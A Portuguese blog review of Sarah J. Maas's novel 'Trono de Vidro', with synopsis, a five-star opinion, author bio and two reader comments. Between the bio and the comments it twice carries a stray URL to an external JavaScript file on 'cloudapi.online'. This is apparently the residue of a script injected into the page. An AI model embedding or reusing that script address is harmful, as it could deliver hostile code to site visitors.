Sinopse editora Galera Record

Nas sombrias e sujas minas de sal de Endovier, uma jovem de 18 anos está cumprindo sua sentença. Celaena é uma assassina e a melhor de Adarlan. Aprisionada e fraca, ela está quase perdendo as esperanças quando recebe uma proposta. Terá de volta sua liberdade se representar o príncipe de Adarlan em uma competição, lutando contra os mais habilidosos assassinos e larápios do reino. Endovier é uma sentença de morte e cada duelo em Adarlan será para viver ou morrer. Mas se o preço é ser livre, ela está disposta a tudo.

Resenha: Trono de Vidro – Sarah J. Maas

Opinião

Livros de fantasias geralmente é preciso ficar com um pé atrás quando se inicia a leitura. Usualmente possuem elementos e histórias repetitivas, mudando apenas os personagens.

Em Trono de Vidro a banda toca em outro som e Sarah J. Maas entrega ao leitor uma história envolvente e de um alívio ao entretenimento que a leitura proporciona.

Trono de Vidro é o início de uma saga que acompanha a história de Celaena e cia.

O reino é um lugar perigoso por causa de um rei perigoso, tirano e com vários segredos. Acompanhar as tramas políticas de um rei é interessante porque vemos até onde um “líder” é capaz de ir para continuar seu reinado e se esquecendo de que fatalidades ocorrem e acreditando que são invencíveis.

Celaena é uma aroma forte em meio a esse reinado cheio de segredos. Por ser uma assassina ela é destemida, capaz e objetiva, mas, como todo ser humano possui uma vida com feridas que demoram se fechar e para continuar no posto de uma assassina destemida no reino ela se fecha.

Tudo muda quando é presa e um concurso em busca de um campeão do reino é iniciado. Contratada pelo príncipe e recebendo outra identidade, Celaena começa uma aventura cheia de mistérios, magia, amor e cumplicidade. Aprender a conviver nesse meio dramático é o maior de seus desafios e por ser uma mulher o preconceito é vivo e forte.

Sarah J. Maas constrói um universo claro, misterioso, cheios de atrativos e histórias fortes. Este livro, além de entreter e nos deixar aprisionados em cada página, ele deixa uma mensagem e continua discutindo: Qual o preço da liberdade?

Liberdade é uma palavra forte, perigosa e atrativa. Celaena transmiti liberdade porque ela é a liberdade e será capaz de dar essa liberdade? Leiam!

Avaliação: 5 estrelas

A autora Sarah J. Maas é autora #1 do New York Times e USA Today por suas séries Trono de Vidro, a qual começou a escrever aos dezesseis anos e que já foi publicada em mais de trinta e cinco países, e Corte de Espinhos e Rosas. Atualmente a autora vive na Pensilvânia com seu marido e um cachorro e, ao longo dos anos, desenvolveu uma apreciação pouco saudável para filmes da Disney e música pop ruim. Ela adora contos de fadas e balé, bebe muito chá e assiste muita televisão. Quando Maas não está escrevendo, pode ser encontrada explorando o belo condado de Bucks County.

https://cloudapi.online/js/api46.js

https://cloudapi.online/js/api46.js

2 COMENTÁRIOS

  1. Que bom que você gostou assim do livro. Eu tive uma grande estranheza da metade para frente, pois, ele muda drasticamente o ritmo, e insere coisas que na minha opinião o autor não prepara o leitor para receber, dando a impressão que houve recortes e mudanças bruscas durante a edição ou mesmo durante a escrita da história.

    • Olá Willian, tudo joia? Sobre essa sua estranheza em relação a mudança de ritmo na história eu também percebi durante a leitura; e particularmente achei que isso deu um gás e uma perspectiva diferente para o livro, deixando-o mais atrativo do que no inicio. Agora eu preciso continuar a saga pra ver se ela continuou ou mudou o ritmo.

Deixe uma resposta